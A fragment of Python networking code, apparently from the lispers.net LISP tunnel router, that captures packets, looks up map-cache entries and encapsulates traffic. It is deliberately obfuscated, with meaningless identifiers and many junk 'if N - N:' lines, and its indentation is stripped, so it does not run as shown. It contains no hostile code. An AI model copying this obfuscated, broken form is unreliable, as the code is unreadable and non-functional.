if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if 92 - 92: ooOoO0o
II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
for Oo00OoOo in iIiIIi1 :
if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
if 24 - 24: i11iIiiIii - I1Ii111
continue
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
ii1 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if ( ii1iIi1iIiI1i ) : return
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
iI1iIIIi1i = "(udp src port 4342 and ip[28] == 0x28)"
for Oo00OoOo in IIII1i :
ii1 = [ Oo00OoOo , iI1iIIIi1i , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
if 89 - 89: iIii1I11I1II1
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 21 - 21: I11i % I11i
return
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
def II1Ii11I111I ( ) :
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if ( I11 ) : I11 . cancel ( )
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
if 34 - 34: I1Ii111 % IiII
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 3 - 3: II111iiii / OOooOOo + IiII . ooOoO0o . OoO0O00
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
def O0oOo00o0 ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
O0O0oOOo0O = packet
packet , II11 , O00oooo00o0O , ii1iii1I1I = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( O0O0oOOo0O != packet ) :
if ( II11 == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , II11 , O00oooo00o0O , ii1iii1I1I )
return
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
if ( my_sa ) : input_interface = device
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
Iii = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , Iii )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if ( device != input_interface and device != "lispers.net" ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
return
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
O0OO0oOoO0O0O = lisp . lisp_decent_push_configured
if ( O0OO0oOoO0O0O ) :
oo000oOo0 = packet . inner_dest . is_multicast_address ( )
iIiI1I1Ii = packet . inner_source . is_local ( )
O0OO0oOoO0O0O = ( iIiI1I1Ii and oo000oOo0 )
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if ( O0OO0oOoO0O0O == False ) :
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
O00o00O = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( O00o00O ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , O00o00O , oO0oIIII )
else :
ii1iii11i1 = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( ii1iii11i1 ,
input_interface ) )
return
if 4 - 4: IiII . IiII % I1ii11iIi11i % Ii1I / Ii1I
if 29 - 29: Oo0Ooo * ooOoO0o * I1ii11iIi11i / i11iIiiIii
if 26 - 26: IiII % I1Ii111 % oO0o % Ii1I
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 55 - 55: ooOoO0o % OoooooooOO / OoooooooOO % OoooooooOO
if 52 - 52: I1ii11iIi11i + I1ii11iIi11i . II111iiii
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
if 22 - 22: i1IIi + Ii1I
if ( packet . inner_version == 4 ) :
O0o0O0OO00o , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 79 - 79: Ii1I . OoO0O00
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
iiIii1I = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( iiIii1I and IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
i1I11iIiII = packet . inner_dest
i1I11iIiII . instance_id = iiIii1I
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , i1I11iIiII )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
if 17 - 17: oO0o
if 22 - 22: I11i + iIii1I11I1II1
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
if ( IiIIiIIIiIii == None or IiIIiIIIiIii . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_source ,
packet . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 57 - 57: I11i
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
if 67 - 67: OoO0O00 . ooOoO0o
return
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if ( IiIIiIIIiIii and IiIIiIIIiIii . is_active ( ) and IiIIiIIIiIii . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( IiIIiIIIiIii . print_eid_tuple ( ) , False ) ) )
if 53 - 53: Ii1I % Oo0Ooo
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
IiIIiIIIiIii . last_refresh_time = time . time ( )
IiIIiIIIiIii . stats . increment ( len ( packet . packet ) )
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
IiiIIiiiiii , OOOO0o , i1I1iIi1IiI , i1111 , O0O000OOOo , i11ii1Ii1 = IiIIiIIIiIii . select_rloc ( packet , oO0oIIII )
if 25 - 25: OOooOOo
if 83 - 83: I1Ii111
if ( IiiIIiiiiii == None and O0O000OOOo == None ) :
if ( i1111 == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "not an EID" )
if 50 - 50: IiII % i1IIi
return
if 21 - 21: OoooooooOO - iIii1I11I1II1
OO0OoOOO0 = "No reachable RLOCs found"
lisp . dprint ( OO0OoOOO0 )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = OO0OoOOO0 )
return
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if ( IiiIIiiiiii and IiiIIiiiiii . is_null ( ) ) :
OO0OoOOO0 = "Drop action RLOC found"
lisp . dprint ( OO0OoOOO0 )
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = OO0OoOOO0 )
return
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
packet . outer_tos = packet . inner_tos
packet . outer_ttl = 32 if ( O0o0O0OO00o ) else packet . inner_ttl
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if ( IiiIIiiiiii ) :
packet . outer_dest . copy_address ( IiiIIiiiiii )
oO0oooooo = packet . outer_dest . afi_to_version ( )
packet . outer_version = oO0oooooo
o0OO0Oo = lisp . lisp_myrlocs [ 0 ] if ( oO0oooooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 3 - 3: I1Ii111 - O0 % iIii1I11I1II1 / IiII . o0oOOo0O0Ooo
packet . outer_source . copy_address ( o0OO0Oo )
if 3 - 3: O0 % OoooooooOO / OOooOOo
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , rloc_entry = i11ii1Ii1 ) == False ) : return
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if ( packet . encode ( i1I1iIi1IiI ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
II1i11i1iIi11 = Oooo0000 if oO0oooooo == 6 else Ii1IIii11
packet . send_packet ( II1i11i1iIi11 , packet . outer_dest )
if 83 - 83: Ii1I
elif ( O0O000OOOo ) :
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
IIIiiiI = O0O000OOOo . rle_nodes [ 0 ] . level
OoO00oo00 = len ( packet . packet )
for Oo0Oo0O in O0O000OOOo . rle_forwarding_list :
if ( Oo0Oo0O . level != IIIiiiI ) : return
if 44 - 44: OoooooooOO % OoooooooOO
packet . outer_dest . copy_address ( Oo0Oo0O . address )
if ( O0OO0oOoO0O0O ) : packet . inner_dest . instance_id = 0xffffff
oO0oooooo = packet . outer_dest . afi_to_version ( )
packet . outer_version = oO0oooooo
o0OO0Oo = lisp . lisp_myrlocs [ 0 ] if ( oO0oooooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 35 - 35: iII111i / I1ii11iIi11i * OoooooooOO . II111iiii / Oo0Ooo
packet . outer_source . copy_address ( o0OO0Oo )
if 1 - 1: OoooooooOO + IiII . i1IIi % I11i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 66 - 66: o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
if 12 - 12: iII111i . IiII . OoOoOO00 / O0
if ( packet . encode ( None ) == None ) : return
if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
packet . print_packet ( "Replicate-to-L{}" . format ( Oo0Oo0O . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
OooOoOOo0oO00 = len ( packet . packet ) - OoO00oo00
packet . packet = packet . packet [ OooOoOOo0oO00 : : ]
if 73 - 73: iII111i / I1ii11iIi11i % I1ii11iIi11i * I11i / I1ii11iIi11i
if 8 - 8: Ii1I
if 35 - 35: IiII + i1IIi * oO0o - Ii1I . Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
del ( packet )
return
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
if 83 - 83: OOooOOo
if 12 - 12: i1IIi . i1IIi - o0oOOo0O0Ooo
def ii1iIIiii1 ( device , not_used , packet ) :
ooOo0O0o0 = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if 65 - 65: ooOoO0o + O0
if ( lisp . lisp_frame_logging ) :
IiII1iiI = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
iII = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( IiII1iiI , iII ) )
if 63 - 63: o0oOOo0O0Ooo * iII111i
if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
if 21 - 21: o0oOOo0O0Ooo
if 81 - 81: I11i / iIii1I11I1II1 - ooOoO0o * I1Ii111 . I1IiiI * I1ii11iIi11i
o0000 = ""
i111i1i = False
OOo0oO00ooO00 = device
if ( ooOo0O0o0 == 14 ) :
iIiIIi1 , IiIii1I1I , OO0Oooo0oo , i111i1i = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
o0000 = lisp . lisp_format_macs ( IiIii1I1I , OO0Oooo0oo )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : ooOo0O0o0 += 4
if 42 - 42: Ii1I * I1Ii111 . IiII * I1IiiI + OoOoOO00
if 25 - 25: I11i . I1IiiI + oO0o
if 75 - 75: IiII - o0oOOo0O0Ooo % iII111i + i11iIiiIii
if 100 - 100: I11i + o0oOOo0O0Ooo - i11iIiiIii - II111iiii
if 40 - 40: OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if ( int ( OO0Oooo0oo [ 1 ] , 16 ) & 1 ) : i111i1i = True
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if ( ooOo0O0o0 != 0 ) :
oOo0OOoooO = struct . unpack ( "H" , packet [ ooOo0O0o0 - 2 : ooOo0O0o0 ] ) [ 0 ]
oOo0OOoooO = socket . ntohs ( oOo0OOoooO )
if ( oOo0OOoooO == 0x8100 ) :
iIi1iIIIiIiI = struct . unpack ( "I" , packet [ ooOo0O0o0 : ooOo0O0o0 + 4 ] ) [ 0 ]
iIi1iIIIiIiI = socket . ntohl ( iIi1iIIIiIiI )
OOo0oO00ooO00 = "vlan" + str ( iIi1iIIIiIiI >> 16 )
ooOo0O0o0 += 4
elif ( oOo0OOoooO == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if ( lisp . lisp_l2_overlay ) : ooOo0O0o0 = 0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
O0oOo00o0 ( packet [ ooOo0O0o0 : : ] , device , OOo0oO00ooO00 , o0000 , i111i1i )
return
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
